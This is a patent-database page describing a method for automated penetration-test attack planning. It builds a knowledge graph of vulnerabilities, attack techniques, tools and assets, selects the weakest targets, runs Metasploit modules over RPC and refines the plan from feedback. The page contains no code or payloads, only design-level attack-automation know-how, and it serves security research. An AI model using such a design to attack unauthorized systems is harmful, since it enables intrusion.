A method, device, and medium for constructing a multi-category risk factor attack planning model.

By constructing a multi-category risk factor attack planning model, the problem of existing technologies being unable to effectively perceive uncertain environments and integrate multiple categories of risk factors is solved. This enables multi-category risk assessment and modeling in uncertain environments, improving the effectiveness and comprehensiveness of penetration testing.

CN116961985BActive Publication Date: 2026-06-30GUANGZHOU UNIVERSITY

Patent Information

Authority / Receiving Office
CN · China
Patent Type
Patents(China)
Current Assignee / Owner
GUANGZHOU UNIVERSITY
Filing Date
2023-04-19
Publication Date
2026-06-30

AI Technical Summary

Technical Problem

Existing attack planning models cannot effectively perceive uncertain environments in black-box environments, are prone to getting trapped in local minima in white-box environments, and lack methods to integrate multiple risk factors, making it impossible to comprehensively investigate system vulnerabilities.

Method used

A multi-category risk factor attack planning model is constructed. By acquiring multi-category risk factors, an attack planning knowledge graph is established to form an attack factor chain. The model is optimized through feedback information, and a priority algorithm is used to assess the vulnerabilities of the target asset. The attack is carried out in conjunction with the Metasploit tool, and the model is updated.

Benefits of technology

It enables the assessment and modeling of multiple risk factors in uncertain environments, integrates multiple risk factors, optimizes attack planning models, and improves the effectiveness and comprehensiveness of penetration testing.

✦ Generated by Eureka AI based on patent content.

Smart Images

  • Figure CN116961985B_ABST
    Figure CN116961985B_ABST
Patent Text Reader

Abstract

This invention discloses a method, device, and medium for constructing a multi-category risk element attack planning model, comprising the following steps: acquiring multi-category risk elements and establishing an attack planning knowledge graph; selecting risk elements from the attack planning knowledge graph based on the physical characteristics of the target asset to form an attack element chain; loading the attack element chain into the attack planning model to attack the target asset; and optimizing the attack planning model based on feedback information from the target asset after the attack. This invention constructs a knowledge graph from an attack perspective, fully considering entity elements in penetration testing scenarios during ontology construction, effectively integrating multi-category risk elements, and effectively evaluating and modeling multi-category risk elements in uncertain environments. This invention can also integrate effective feedback information generated during the attack process into the attack planning model, using network security attack and defense elements in the scenario for autonomous attack reasoning, and incorporating feedback information into the next attack planning decision.
Need to check novelty before this filing date? Find Prior Art

Description

[0001] Technology Dimension

[0002] This invention relates to the field of network security technology, and in particular to a method, device, and medium for constructing a multi-category risk factor attack planning model. Background Technology

[0003] In today's information society, the security threats facing the Internet are increasing day by day. The emergence of advanced persistent attacks has made the security problems in cyberspace more severe. Hackers are constantly attacking the information systems of enterprises and organizations through various means, stealing sensitive information, and causing great losses to enterprises and organizations. Therefore, ensuring information security has become an important task for modern enterprises and organizations.

[0004] Penetration testing is commonly used to test the security level of information systems. Penetration testing involves simulating hacker attacks, establishing an attack plan model, and then launching an attack on the target information system to test its security capabilities and discover potential vulnerabilities.

[0005] In black-box environments, some existing attack planning models fail to effectively perceive uncertain environments; attack planning models suitable for white-box environments are prone to getting trapped in local minima and cannot comprehensively identify system vulnerabilities, such as Markov decision process models. On the other hand, facing the dynamic and complex cyberspace environment, where security-related information comes from numerous sources, is abundant, and changes rapidly, existing attack planning model construction methods lack effective methods to integrate multiple categories of risk factors. Currently, there is a lack of attack planning models that can integrate multiple categories of risk factors and adapt to uncertain environments. Summary of the Invention

[0006] In view of this, embodiments of the present invention provide a method, device and medium for constructing a multi-category risk factor attack planning model.

[0007] The first aspect of this invention provides a method for constructing a multi-category risk factor attack planning model, comprising the following steps:

[0008] Acquire multiple risk factors and build an attack planning knowledge graph;

[0009] Based on the physical characteristics of the target asset, risk elements are selected from the attack planning knowledge graph to form an attack element chain;

[0010] The attack element chain is loaded into the attack planning model to attack the target asset;

[0011] The attack planning model is optimized based on feedback information from the target asset after the attack.

[0012] Furthermore, the acquisition of multi-category risk factors specifically includes a combination of automated acquisition and manual annotation. Automated acquisition is achieved by using web crawler scripts to automatically crawl attribute data as risk factor entities in open-source datasets. After acquiring the risk factors, the relationships between the risk factors are manually annotated.

[0013] Furthermore, the entities of the risk elements include vulnerability elements, attack elements, tool elements, static asset elements, and dynamic asset elements;

[0014] The relationships among the risk factors include:

[0015] The dynamic asset elements are associated with the static asset elements;

[0016] The static asset class elements have the vulnerability class elements;

[0017] The attack-type elements are associated with the tool-type elements;

[0018] The tool-type elements utilize the vulnerability-type elements to act on the dynamic asset-type elements;

[0019] The dynamic asset category elements implement the attack category elements.

[0020] Furthermore, the step of selecting risk elements from the attack planning knowledge graph based on the physical characteristics of the target asset specifically includes the following steps:

[0021] Analyze the protection strength of the target asset across various dimensions; wherein, the dimensions of the target asset include asset dimension, configuration dimension, and protection dimension;

[0022] The target asset dimension with the lowest protection strength is evaluated using a priority algorithm. For the target asset dimension with the lowest protection strength, the corresponding risk elements are extracted from the knowledge graph to form an attack element chain.

[0023] Furthermore, the resulting attack element chain includes dynamic asset elements, attack elements associated with dynamic asset elements, tool elements associated with attack elements, vulnerability elements associated with tool elements, and static asset elements associated with vulnerability elements.

[0024] Furthermore, the attack on the target asset specifically includes the following steps:

[0025] Initialize dynamic asset elements to form a network topology;

[0026] Query the static asset elements associated with the dynamic asset elements to obtain the attack elements that can be executed by the dynamic asset elements;

[0027] Based on the executable attack elements of dynamic asset elements, query the tool elements associated with the attack elements;

[0028] Query the sub-tools associated with the tool category element; if any exist, further query the tool category elements of the sub-tools.

[0029] Use the aforementioned tool-type elements to attack the target asset.

[0030] Furthermore, optimizing the attack planning model based on feedback information from the target asset after the attack specifically includes the following steps:

[0031] Collect feedback information generated after the attack planning model attacks the target assets;

[0032] When the feedback information is a vulnerability in the target asset, query the static asset elements that have the vulnerability element, and update the vulnerability element on the dynamic asset elements in the attack element chain.

[0033] When the feedback information is attribute information of the target asset itself, the attribute information of the target asset itself is directly updated on the dynamic asset class elements in the attack element chain.

[0034] Furthermore, when the attack planning model attacks the target asset but does not generate new feedback information, the attack operation ends, and the optimization of the attack planning model is completed.

[0035] A second aspect of the present invention discloses an electronic device, including a processor and a memory;

[0036] The memory is used to store programs;

[0037] The processor executes the program to implement a method for constructing a multi-category risk factor attack planning model.

[0038] The third aspect of the present invention discloses a computer-readable storage medium storing a program that is executed by a processor to implement a method for constructing a multi-category risk factor attack planning model.

[0039] The embodiments of the present invention have the following beneficial effects: The method, device, and medium for constructing a multi-category risk factor attack planning model disclosed in the present invention construct a knowledge graph from an attack perspective, fully consider entity elements in penetration testing scenarios during ontology construction, effectively integrate multi-category risk factors, and effectively evaluate and model multi-category risk factors in uncertain environments. The present invention can also integrate effective feedback information generated during the attack process into the attack planning model, utilize network security attack and defense elements in the scenario for autonomous attack reasoning, and incorporate feedback information into the next attack planning decision.

[0040] Additional aspects and advantages of the invention will be set forth in the description which follows, and in part will be obvious from the description or may be learned by practice of the invention. Attached Figure Description

[0041] To more clearly illustrate the technical solutions in the embodiments of this application, the accompanying drawings used in the description of the embodiments will be briefly introduced below. Obviously, the accompanying drawings described below are only some embodiments of this application. For those skilled in the art, other drawings can be obtained based on these drawings without creative effort.

[0042] Figure 1 This is a basic implementation flowchart of the method, equipment, and medium for constructing a multi-category risk factor attack planning model according to the present invention;

[0043] Figure 2 This is a flowchart illustrating the knowledge graph construction process of a multi-category risk factor attack planning model construction method, device, and medium of the present invention.

[0044] Figure 3 This is a schematic diagram of the internal relationships of the knowledge graph of a method, device, and medium for constructing a multi-category risk factor attack planning model according to the present invention;

[0045] Figure 4 This is a network topology diagram illustrating the method, device, and medium for constructing a multi-category risk element attack planning model according to the present invention;

[0046] Figure 5 This is a schematic diagram of the attack element chain of a multi-category risk element attack planning model construction method, device and medium of the present invention;

[0047] Figure 6 This is an attack planning flowchart of a multi-category risk factor attack planning model construction method, device, and medium of the present invention. Detailed Implementation

[0048] To make the objectives, technical solutions, and advantages of this application clearer, the following detailed description is provided in conjunction with the accompanying drawings and embodiments. It should be understood that the specific embodiments described herein are merely illustrative and not intended to limit the scope of this application.

[0049] As mentioned earlier, existing penetration testing techniques, operating in a black-box environment, cannot effectively perceive uncertain environments; while attack planning models suitable for white-box environments are prone to getting trapped in local minima, failing to comprehensively identify system vulnerabilities, such as Markov decision process models. Furthermore, facing the dynamic and complex cyberspace environment, where security-related information is diverse, abundant, and rapidly changing, existing attack planning model construction methods lack effective methods to integrate multiple risk factors. There is a lack of existing attack planning models capable of integrating multiple risk factors and adapting to uncertain environments.

[0050] To address this, embodiments of the present invention provide a method for constructing a multi-category risk factor attack planning model, aiming to solve the following problems:

[0051] ① In a black-box environment, effectively assess and model multiple risk factors under uncertain conditions;

[0052] ②Integrate the effective feedback information generated during the attack process into the attack planning model;

[0053] ③ It can automatically build an attack planning knowledge base by utilizing the knowledge system and processing obtained by experts in manual attack planning;

[0054] ④ Establish an effective link between the attack planning model and the actual asset system framework.

[0055] This invention provides a method for constructing a multi-category risk factor attack planning model, such as... Figure 1 As shown, it includes the following steps:

[0056] S100. Acquire multiple risk factors and establish an attack planning knowledge graph;

[0057] S200. Select risk elements from the attack planning knowledge graph based on the physical characteristics of the target asset to form an attack element chain;

[0058] S300. Load the attack element chain into the attack planning model to attack the target asset;

[0059] S400. Optimizes the attack planning model based on feedback information from the target asset after the attack.

[0060] The implementation process of each step in the embodiments of the present invention is described in detail below:

[0061] S100. Acquire multiple risk factors and establish an attack planning knowledge graph.

[0062] The embodiments of this invention adopt a top-down construction approach. Based on the network security elements involved in the attack scenario, such as attack techniques and tactics, exploit vulnerabilities, attack tools, target asset configuration information, topology information, etc., a network security ontology model from the attack perspective is constructed. Then, corresponding knowledge is extracted and relationships are constructed from open source datasets. After quality assessment, the knowledge graph is finally stored in a graph database.

[0063] like Figure 2 As shown, step S100 involves acquiring multiple categories of risk elements, specifically through a combination of automated acquisition and manual annotation. Automated acquisition is achieved by using web crawler scripts to automatically extract attribute data as risk element entities from open-source datasets. After acquiring the risk elements, the relationships between them are manually annotated. The open-source datasets used in this invention for acquiring multiple categories of risk elements include Common Platform Enumeration Standards (CPE), Common Vulnerability Disclosure Databases (CVE), and the ATT&CK knowledge base. Various types of risk elements are automatically crawled using web crawling frameworks such as Scrapy, and the relationships between risk elements are manually annotated based on expert experience.

[0064] like Figure 3 As shown, the entities of risk factors include five categories: vulnerability factors, attack factors, tool factors, static asset factors, and dynamic asset factors.

[0065] The relationships between risk factors include:

[0066] Dynamic asset elements are associated with static asset elements; static asset elements have vulnerability elements; attack elements are associated with tool elements; tool elements exploit vulnerability elements to act on dynamic asset elements; dynamic asset elements implement attack elements.

[0067] The following section details the attribute information of the entities involved in various risk factors.

[0068] The attributes of vulnerability-type elements include vulnerability name, vulnerability impact level, a list of related attack-type element names, and an additional description of the vulnerability. Each vulnerability element entity in a vulnerability-type element category has these four attributes.

[0069] Specifically, the "vulnerability name" is used to identify the vulnerability number in the vulnerability class feature dataset, such as the CVE vulnerability number, and it can be used as an attribute value for the associated vulnerability class name list.

[0070] "Vulnerability Impact Level" represents the degree of impact of the vulnerable entity, and the standard references the Common Vulnerability Scoring System (CVSS) and is used in subsequent priority evaluation algorithms;

[0071] The “List of Associated Attack-Type Feature Names” consists of the “Attack Name” attribute set of attack-type features and is used to associate attack-type feature entities.

[0072] The "Additional Description of the Vulnerability" section describes the specific significance of the vulnerability element entity, facilitating manual analysis by experts.

[0073] The attributes of attack-type elements include the attack name, a list of related tool-type element names, a list of related vulnerability-type element names, a list of related dynamic asset-type element names, and an additional description of the attack. Each attack element entity in an attack-type element set has these five attributes.

[0074] Specifically, the "attack name" is used to identify attack techniques and tactics;

[0075] The “List of Associated Tool Category Feature Names” consists of the “Tool Name” attribute set of tool category features and is used to associate tool feature entities.

[0076] The “List of Associated Vulnerability Category Element Names” consists of a set of “Vulnerability Name” attributes for vulnerability category elements and is used to associate vulnerability element entities.

[0077] The “List of Associated Dynamic Asset Element Names” consists of the “Asset IP” attribute set of dynamic asset elements and is used to associate dynamic asset element entities.

[0078] The "Additional Description of the Attack" section describes the specific meaning of the attack element entities, facilitating manual analysis by experts.

[0079] The attributes of a tool-type element include tool name, tool type, tool usage, a list of associated sub-tool names, attack tool result type, attack result, and an additional description of the attack tool. Each tool element entity within a tool-type element includes these seven attributes.

[0080] Specifically, the "tool name" is used to identify the specific attack tool;

[0081] The "Tool Type" has two attributes: "Tool Attack" and "Associated Attack". The former indicates that the tool element entity can complete the attack independently without associated sub-tools, while the latter indicates that when querying the tool entity, it is necessary to query its associated sub-tools.

[0082] "Tool Usage" consists of standardized tool invocation commands based on Metasploit, used to invoke attack tools;

[0083] The “List of Associated Sub-Tool Names” consists of the “Tool Names” of the tool category elements and is used to associate sub-tools.

[0084] The "Attack Tool Result Type" has two attributes: "Asset" and "Vulnerability". If it is the former, the attack result will be used to update the dynamic asset element entity; if it is the latter, the attack result will be used to query the vulnerability element entity.

[0085] "Attack Results" is used to store the actual execution results of the attack tools;

[0086] The "Additional Description of the Attack Tool" section describes the specific meaning of the tool entity, facilitating manual analysis by experts.

[0087] The attributes of static asset elements include asset name, asset type, vendor name, product name, version number, a list of vulnerability names associated with the host asset, update package information, version information, and additional description of the asset. Each static asset element entity in the static asset category includes these nine attributes.

[0088] Static asset attributes are mostly used to characterize information about the target asset, such as vendor name and version number. Specifically, the "List of Vulnerability Names Associated with Host Assets" consists of the "Vulnerability Names" of the vulnerability category elements.

[0089] The attributes of dynamic asset elements include asset IP, a list of associated asset IPs, domain name, open ports, configuration information, security measures, asset type, product name, and version number. Each dynamic asset element entity within the dynamic asset category includes these nine attributes.

[0090] Specifically, "asset IP" is used to identify the IP address of the target asset obtained during the attack;

[0091] The "List of Associated Asset IPs" consists of a set of accessible asset IPs, such as... Figure 4 As shown, based on the attribute of "associated asset IP list", dynamic asset element entities can establish connections in the graph through network reachability relationships. This allows for the automatic mapping of the network topology of the target controlled asset during the generation of new dynamic asset element entities, and indicates whether it is out of the network. For example, in the figure, the controlled host 192.168.1.2 in the first-layer intranet is an out-of-network host, while 192.168.1.3 is an in-network host, which is more conducive to the subsequent attack planning and reasoning process.

[0092] "Domain name" is used to identify the domain name address corresponding to the target asset;

[0093] "Open ports" consist of the set of port numbers obtained during the host scanning process;

[0094] "Configuration information" is used to identify inappropriate configuration information of the target asset, such as leaked user credentials;

[0095] "Protective Measures" is used to identify the protective information of the target asset, such as WAF model, etc.

[0096] S200. Select risk elements from the attack planning knowledge graph based on the physical characteristics of the target asset to form an attack element chain;

[0097] S300. Load the attack element chain into the attack planning model to attack the target asset;

[0098] The overall attack planning implementation framework for steps S200-300 is as follows: Figure 6 As shown. Risk elements are selected from the attack planning knowledge graph based on the physical characteristics of the target asset, specifically including the following steps:

[0099] S201. Analyze the protection strength of the target asset across various dimensions; where the dimensions of the target asset include asset dimension, configuration dimension, and protection dimension;

[0100] S202. The target asset dimension with the lowest protection strength is evaluated using a priority algorithm. For the target asset dimension with the lowest protection strength, the corresponding risk elements are extracted from the knowledge graph to form an attack element chain.

[0101] This embodiment addresses the problem of too many dimensions of target assets in attack planning by fully utilizing the "weakest link" effect of target asset security protection. It uses a priority evaluation algorithm to identify the vulnerabilities of target assets from the asset, configuration, and protection dimensions, providing quantitative support for the construction of the attack element chain.

[0102] In this embodiment, the asset dimension refers to assets with a large number of historical vulnerabilities, such as Shiro, Weblogic, WordPress, and open-source CMS, or assets with high attack potential, such as firewalls, VPNs, and centralized control devices; the configuration dimension refers to the amount of inappropriate configuration information existing in the target asset, such as error messages for different payloads, sensitive backend paths, and source code leaks; the protection dimension refers to the level of protection of the target asset, such as whether it is protected by a WAF or whether antivirus software is running.

[0103] In step S200 of this embodiment, during the dynamic query process of the knowledge graph, a priority evaluation algorithm is first used to evaluate all dynamic asset entities. Assets with more vulnerabilities, lower protection levels, and higher attack rewards are prioritized for attack entity queries, and further construction is performed. Figure 6 The attack element chain in the knowledge graph. The attack element chain is composed of five types of entity nodes in the knowledge graph: dynamic assets, static assets, attacks, tools, and vulnerabilities, according to the association rules.

[0104] Step S300 involves attacking the target asset, specifically including the following steps:

[0105] S301. Initialize dynamic asset elements to form a network topology;

[0106] S302. Query the static asset elements associated with the dynamic asset elements to obtain the attack elements that can be executed by the dynamic asset elements;

[0107] S303. Based on the executable attack elements of dynamic asset elements, query the tool elements associated with the attack elements;

[0108] S304. Query the sub-tools associated with the tool category features. If any exist, further query the tool category features of the sub-tools.

[0109] S305. Use tool-type elements to attack target assets.

[0110] In step S300 of this embodiment, when the attack begins, the dynamic asset element entity is first initialized, which only contains the attack node. New dynamic asset element entities are dynamically added as the target host gains permissions, forming a network topology. When there are multiple attack paths, a priority evaluation algorithm is called to select the optimal attack path. Then, by querying its associated attack element entity, the attack strategy that can be executed on the current dynamic asset element entity can be obtained. Next, according to each attack strategy, its associated tool element entity is queried, and the associated tool element entity is applied to attack the target asset.

[0111] S400. Optimizes the attack planning model based on feedback information from the target asset after the attack.

[0112] In this embodiment, step S400 optimizes the attack planning model based on feedback information from the target asset after the attack, specifically including the following steps:

[0113] S401. Collect feedback information generated after the attack planning model attacks the target asset;

[0114] S402. When the feedback information is a vulnerability in the target asset, query the static asset elements with vulnerability elements and update the vulnerability elements on the dynamic asset elements in the attack element chain.

[0115] S403. When the feedback information is the attribute information of the target asset itself, directly update the attribute information of the target asset itself on the dynamic asset class elements in the attack element chain.

[0116] After an attack is launched on a target asset, the asset will output certain feedback information reflecting the effectiveness of the attack. This feedback can be categorized into two types: vulnerability type and asset type. The vulnerability type indicates the vulnerable entity within the target asset. The attack planning model will further query the vulnerable entity and its associated static asset entity, updating the dynamic asset entity accordingly. The asset type indicates problems with the target asset in areas such as permission granting or resource configuration. The attack planning model will directly update the dynamic asset entity accordingly.

[0117] Each round of attack generates a local attack element chain (local attack plan). When the attack no longer generates new feedback information, it is considered to be the end of the attack, and the generation of new attack plans stops, thus completing the optimization of the attack planning model.

[0118] In this embodiment, the attack planning model is developed based on the open-source Python library pymetasploit3, standardizing the functionality of each module of the Metasploit penetration testing framework. This embodiment uses RPC to remotely invoke the framework, allowing operation of the attack planning model's exploit, payload, auxiliary, and encoder modules without needing to access the console. Simultaneously, relevant tool data parameters are stored as tool entity attributes in the knowledge graph and updated in real-time as tools are invoked.

[0119] This invention also discloses a computer program product or computer program, which includes computer instructions stored in a computer-readable storage medium. A processor of a computer device can read the computer instructions from the computer-readable storage medium, and the processor executes the computer instructions, causing the computer device to perform... Figure 1 The method shown.

[0120] This invention implements a cybersecurity ontology model oriented towards attack planning, effectively modeling the cyberspace elements involved in penetration testing and integrating multiple categories of risk elements; based on the standardization of Metasploit tool interfaces, attack tools can effectively link with knowledge graphs, fully collecting feedback information generated during penetration testing; and based on knowledge graph attack planning algorithms, by constructing attack element chains and priority evaluation algorithms, global network attack and defense reasoning can be achieved.

[0121] In some alternative embodiments, the functions / operations mentioned in the block diagrams may not occur in the order shown in the operation diagrams. For example, depending on the functions / operations involved, two consecutively shown blocks may actually be executed substantially simultaneously, or the blocks may sometimes be executed in reverse order. Furthermore, the embodiments presented and described in the flowcharts of this invention are provided by way of example to provide a more comprehensive understanding of the technology. The disclosed methods are not limited to the operations and logic flows presented herein. Alternative embodiments are contemplated in which the order of various operations is altered and sub-operations described as part of a larger operation are executed independently.

[0122] Furthermore, although the invention has been described in the context of functional modules, it should be understood that, unless otherwise stated, one or more of the described functions and / or features may be integrated into a single physical device and / or software module, or one or more functions and / or features may be implemented in a separate physical device or software module. It is also understood that a detailed discussion of the actual implementation of each module is unnecessary for understanding the invention. Rather, given the properties, functions, and internal relationships of the various functional modules in the apparatus disclosed herein, the actual implementation of the module will be understood within the scope of conventional skill of an engineer. Therefore, those skilled in the art can implement the invention as set forth in the claims using ordinary techniques without excessive experimentation. It is also understood that the specific concepts disclosed are merely illustrative and not intended to limit the scope of the invention, which is determined by the full scope of the appended claims and their equivalents.

[0123] If the aforementioned functions are implemented as software functional units and sold or used as independent products, they can be stored in a computer-readable storage medium. Based on this understanding, the technical solution of this invention, essentially, or the part that contributes to the prior art, or a portion of the technical solution, can be embodied in the form of a software product. This computer software product is stored in a storage medium and includes several instructions to cause a computer device (which may be a personal computer, server, or network device, etc.) to execute all or part of the steps of the methods described in the various embodiments of this invention. The aforementioned storage medium includes various media capable of storing program code, such as USB flash drives, portable hard drives, read-only memory (ROM), random access memory (RAM), magnetic disks, or optical disks.

[0124] The logic and / or steps represented in the flowchart or otherwise described herein, for example, can be considered as a sequenced list of executable instructions for implementing logical functions, and can be embodied in any computer-readable medium for use by, or in conjunction with, an instruction execution system, apparatus, or device (such as a computer-based system, a processor-included system, or other system that can fetch and execute instructions from, an instruction execution system, apparatus, or device). For the purposes of this specification, "computer-readable medium" can be any means that can contain, store, communicate, propagate, or transmit programs for use by, or in conjunction with, an instruction execution system, apparatus, or device.

[0125] In the description of this specification, references to terms such as "one embodiment," "some embodiments," "example," "specific example," or "some examples," etc., indicate that a specific feature, structure, material, or characteristic described in connection with that embodiment or example is included in at least one embodiment or example of the invention. In this specification, the illustrative expressions of the above terms do not necessarily refer to the same embodiment or example. Furthermore, the specific features, structures, materials, or characteristics described may be combined in any suitable manner in one or more embodiments or examples.

[0126] Although embodiments of the invention have been shown and described, those skilled in the art will understand that various changes, modifications, substitutions and alterations can be made to these embodiments without departing from the principles and spirit of the invention, the scope of which is defined by the claims and their equivalents.

[0127] The above is a detailed description of the preferred embodiments of the present invention, but the present invention is not limited to the embodiments described. Those skilled in the art can make various equivalent modifications or substitutions without departing from the spirit of the present invention, and these equivalent modifications or substitutions are all included within the scope defined by the claims of this application.

Claims

1. A method for constructing a multi-category risk factor attack planning model, characterized in that, Includes the following steps: Acquire multiple risk factors and build an attack planning knowledge graph; Based on the physical characteristics of the target asset, risk elements are selected from the attack planning knowledge graph to form an attack element chain; The attack element chain is loaded into the attack planning model to attack the target asset; The attack planning model is optimized based on feedback information from the target assets after the attack. The entities of the risk elements include vulnerability elements, attack elements, tool elements, static asset elements, and dynamic asset elements. The relationships among the risk factors include: The dynamic asset elements are associated with the static asset elements; The static asset class elements have the vulnerability class elements; The attack-type elements are associated with the tool-type elements; The tool-type elements utilize the vulnerability-type elements to act on the dynamic asset-type elements; The dynamic asset category elements implement the attack category elements.

2. The method for constructing a multi-category risk factor attack planning model according to claim 1, characterized in that, The acquisition of multiple risk factors specifically includes a combination of automated acquisition and manual annotation. Automated acquisition is achieved by using web crawler scripts to automatically crawl attribute data from open-source datasets as risk factor entities. After acquiring the risk factors, the relationships between the risk factors are manually annotated.

3. The method for constructing a multi-category risk factor attack planning model according to claim 1, characterized in that, The selection of risk elements from the attack planning knowledge graph based on the physical characteristics of the target asset specifically includes the following steps: Analyze the protection strength of the target asset across various dimensions; wherein, the dimensions of the target asset include asset dimension, configuration dimension, and protection dimension; The target asset dimension with the lowest protection strength is evaluated using a priority algorithm. For the target asset dimension with the lowest protection strength, the corresponding risk elements are extracted from the knowledge graph to form an attack element chain.

4. The method for constructing a multi-category risk factor attack planning model according to claim 3, characterized in that, The resulting attack element chain includes dynamic asset elements, attack elements associated with dynamic asset elements, tool elements associated with attack elements, vulnerability elements associated with tool elements, and static asset elements associated with vulnerability elements.

5. The method for constructing a multi-category risk factor attack planning model according to claim 3, characterized in that, The attack on the target asset specifically includes the following steps: Initialize dynamic asset elements to form a network topology; Query the static asset elements associated with the dynamic asset elements to obtain the attack elements that can be executed by the dynamic asset elements; Based on the executable attack elements of dynamic asset elements, query the tool elements associated with the attack elements; Query the sub-tools associated with the tool category element; if any exist, further query the tool category elements of the sub-tools. Use the aforementioned tool-type elements to attack the target asset.

6. The method for constructing a multi-category risk factor attack planning model according to claim 5, characterized in that, The optimization of the attack planning model based on feedback information from the target asset after the attack specifically includes the following steps: Collect feedback information generated after the attack planning model attacks the target assets; When the feedback information is a vulnerability in the target asset, query the static asset elements that have the vulnerability element, and update the vulnerability element on the dynamic asset elements in the attack element chain. When the feedback information is attribute information of the target asset itself, the attribute information of the target asset itself is directly updated on the dynamic asset class elements in the attack element chain.

7. The method for constructing a multi-category risk factor attack planning model according to claim 6, characterized in that, When the attack planning model attacks the target asset and does not generate new feedback information, the attack operation ends, and the optimization of the attack planning model is completed.

8. An electronic device, characterized in that, Including the processor and memory; The memory is used to store programs; The processor executes the program to implement the method as described in any one of claims 1-7.

9. A computer-readable storage medium, characterized in that, The storage medium stores a program that is executed by a processor to implement the method as described in any one of claims 1-7.